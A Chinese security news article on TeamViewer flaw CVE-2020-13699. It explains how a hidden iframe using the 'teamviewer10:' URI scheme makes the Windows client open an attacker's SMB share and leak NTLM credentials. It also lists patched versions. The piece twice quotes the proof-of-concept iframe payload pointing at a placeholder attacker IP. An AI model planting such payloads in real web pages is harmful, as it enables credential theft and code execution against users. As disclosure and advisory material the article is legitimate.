[置顶]TeamViewer全系版本曝无需密码即可入侵你电脑漏洞(含POC),速度升级!!!附下载!

华盟原创文章投稿奖励计划

TeamViewer相信大家都熟悉了。是目前国内外流行的远程访问和故障排除应用程序,TeamViewer官方发布消息说最近修复了一个漏洞漏洞可能使攻击者悄悄地建立与您计算机的连接并进一步利用该系统。


TeamViewer全系版本曝无需密码即可入侵你电脑漏洞(含POC),速度升级!!!附下载!

漏洞影响TeamViewer版本8,9, 10,11,12,13,14,15全系列产品!

成功利用此错误后,该错误将使未经身份验证的远程角色在Windows PC上执行任意代码,或获得密码哈希(例如,通过蛮力破解)。

漏洞编号:CVE-2020-13699,严重程度8.8分。属于特殊的安全漏洞类别,称为“  无引号的搜索路径或元素(CWE-428)”。这些利用了以下事实:传递给程序的参数不被“引用”。

TeamViewer全系版本曝无需密码即可入侵你电脑漏洞(含POC),速度升级!!!附下载!

TeamViewer全系版本曝无需密码即可入侵你电脑漏洞(含POC),速度升级!!!附下载!

这可能导致程序将参数视为直接命令,而不是输入值。

攻击者可以使用iframe和URI方案

要执行典型的攻击,用户将需要浏览到一个恶意页面,该恶意页面会在其Web浏览器中加载iframe(可能是隐藏的或小到一个像素的像素),以免被偶然的浏览者看到。

TeamViewer全系版本曝无需密码即可入侵你电脑漏洞(含POC),速度升级!!!附下载!

iframe使用“ teamviewer10:” URI方案进行自身加载,该方案告诉Web浏览器启动安装了计算机的TeamViewer应用程序。

自定义URI方案由本地安装的应用程序使用,这些应用程序希望使用户能够从其Web浏览器启动它们。例如,在Web浏览器中以“ skype:”开头的URL将启动Skype。Slack,Zoom和Spotify等其他常用应用程序使用类似的URI结构。

要利用该TeamViewer漏洞,攻击者会将iframe的src  属性设置为

'teamviewer10:--play \ attacker-IP  share  fake.tvs'

TeamViewer全系版本曝无需密码即可入侵你电脑漏洞(含POC),速度升级!!!附下载!

CVE-2020-13699 PoC示例,其中一个几乎不可见的iframe启动TeamViewer

此命令指示本地安装的TeamViewer应用程序通过服务器消息块(SMB)协议连接到攻击者的服务器。 

 Praetorian的安全工程师Jeffrey Hofmann 说:“攻击者可以使用精心制作的URL

(iframe src='teamviewer10: --play \attacker-IPsharefake.tvs')

将恶意iframe嵌入网站中,该URL 会启动TeamViewer Windows桌面客户端并迫使其打开远程SMB共享  。”

攻击者无需密码

此外,由于SMB共享,并且是受害者的计算机发起与攻击者的SMB共享的连接,因此攻击者不需要知道用户的密码。他们将自动通过身份验证并获得访问权限。

霍夫曼解释说:“ Windows在打开SMB共享时将执行NTLM身份验证,并且可以转发该请求(使用诸如响应程序之类的工具)以执行代码(或捕获该请求以进行哈希破解)。” 

这位工程师认为,从可用于攻击的URI方案中可以明显看出,多个TeamViewer版本受到了影响。

影响URI处理程序

  • teamviewer10

  • teamviewer8

  • teamviewerapi

  • tvchat1

  • tvcontrol1

  • tvfiletransfer1

  • tvjoinv8

  • tvpresent1

  • tvsendfile1

  • tvsqcustomer1

  • tvsqsupport1

  • tvvideocall1

  • tvvpn1

该漏洞的修复非常简单。所需要做的只是对输入进行“引用”,以便本地安装的TeamViewer应用将其视为“值”而不是系统命令。

“通过引用上述URI处理程序传递的参数,例如URL:teamviewer10协议“

C: Program Files(x86) TeamViewer  TeamViewer.exe”“%1”

,来解决此问题。

在今天发布的TeamViewer声明中,该公司确认该错误存在于Windows上运行的多个TeamViewer版本中,并宣布了一个补丁。

“今天,我们为Windows平台发布了TeamViewer 8至15的某些更新。我们在与CVE 2020-13699有关的URI处理方面实现了一些改进。”

该公司进一步感谢安全工程师负责任地报告该漏洞。

“感谢Praetorian的Jeffrey Hofmann,感谢您的专业精神,并遵循负责任的披露模型。我们感谢您与我们联系,并希望在最新版本中确认您发现的问题。”

Windows的TeamViewer用户应考虑升级到新的程序版本,其中包括:

  • 8.0.258861

  • 9.0.28860

  • 10.0.258873

  • 11.0.258870

  • 12.0.258869

  • 13.2.36220

  • 14.2.56676

  • 14.7.48350

  • 15.8.3

15新版版本这里下载

https://www.teamviewer.cn/cn/download/windows/

所有15之前老版本都可以这里下载

https://www.teamviewer.cn/cn/download/previous-versions/


华盟知识星球入口


本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/264635.html

发表评论